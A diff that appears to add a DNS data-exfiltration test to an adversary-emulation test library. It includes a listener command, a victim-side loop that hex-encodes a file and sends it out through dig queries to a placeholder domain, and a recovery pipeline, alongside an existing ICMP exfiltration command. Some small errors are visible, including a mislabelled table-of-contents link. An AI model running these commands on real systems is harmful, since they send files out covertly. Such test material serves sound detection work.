diff --git a/atomics/T1048/T1048.md b/atomics/T1048/T1048.md
index 29d71766..3d4ceabb 100644
--- a/atomics/T1048/T1048.md
+++ b/atomics/T1048/T1048.md
@@ -23,6 +23,7 @@ Anonymous FTP command-line example:(Citation: Palo Alto OilRig Oct 2016)
 
 - [Atomic Test #4 - Exfiltration Over Alternative Protocol - ICMP](#atomic-test-4---exfiltration-over-alternative-protocol---icmp)
 
+- [Atomic Test #4 - Exfiltration Over Alternative Protocol - DNS](#atomic-test-4---exfiltration-over-alternative-protocol---icmp)
 
 <br/>
 
@@ -137,4 +138,41 @@ $ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Cont
 
 
 
+<br/>
+
+## Atomic Test #5 - Exfiltration Over Alternative Protocol - DNS
+Exfiltration of specified file using DNS. A domain name (example.com) and a hosting server is required. In your domain control panel, configure the below DNS settings:
+
+a) Create an A record ns1.example.com that points to the server IP. 
+
+b) Set the NS record (ns2.example.com) to point to the server (ns1.example.com).
+
+**Supported Platforms:** Linux
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| domain | target DNS domain | url | ns2.example.com|
+| input_file | Path to file to be exfiltrated. | Path | ./example.txt|
+| output_file | Filename of the data exfiltrated | string | received_data.txt|
+
+
+#### Adversary machine: Run with `sh`! 
+
+1. On the adversary machine run the below command.
+
+tshark -f "udp port 53" -Y "dns.qry.type == 1 and dns.flags.response == 0 and dns.qry.name matches ".domain"" >> received_data.txt
+
+#### Attack Commands: Run with `sh`! 
+
+2. On the victim machine run the below commands.
+
+xxd -p input_file > encoded_data.hex | for data in `cat encoded_data.hex`; do dig $data.domain; done
+
+#### Recover data by running the below commands. Run with `sh`! 
+
+3. Once the data is received, use the below command to recover the data.
+
+cat output_file | cut -d "A" -f 2 | cut -d " " -f 2 | cut -d "." -f 1 | sort | uniq | xxd -p -r
+
 <br/>
diff --git a/atomics/T1048/T1048.yaml b/atomics/T1048/T1048.yaml
index e014d2cd..1d512242 100644
--- a/atomics/T1048/T1048.yaml
+++ b/atomics/T1048/T1048.yaml
@@ -110,3 +110,40 @@ atomic_tests:
     elevation_required: false
     command: |
       $ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("#{ip_address}", 1500, $Data) }
+
+
+- name: Exfiltration Over Alternative Protocol - DNS
+  description: |
+    Exfiltration of specified file over DNS protocol.
+
+  supported_platforms:
+    - linux
+
+  input_arguments:
+    domain: 
+      description: target DNS domain
+      type: url
+      default: ns2.example.com
+    input_file:
+      description: Path to file to be exfiltrated.
+      type: Path
+      default: ./example.txt
+    output_file:
+      description: Filename of the data exfiltrated.
+      type: String
+      default: received_data.txt
+
+  executor:
+    name: manual
+    steps: |
+      1. On the adversary machine run the below command.
+
+          tshark -f "udp port 53" -Y "dns.qry.type == 1 and dns.flags.response == 0 and dns.qry.name matches ".domain"" >> received_data.txt
+
+      2. On the victim machine run the below commands.
+
+          xxd -p input_file > encoded_data.hex | for data in `cat encoded_data.hex`; do dig $data.domain; done
+          
+      3. Once the data is received, use the below command to recover the data.
+
+          cat output_file | cut -d "A" -f 2 | cut -d " " -f 2 | cut -d "." -f 1 | sort | uniq | xxd -p -r
\ No newline at end of file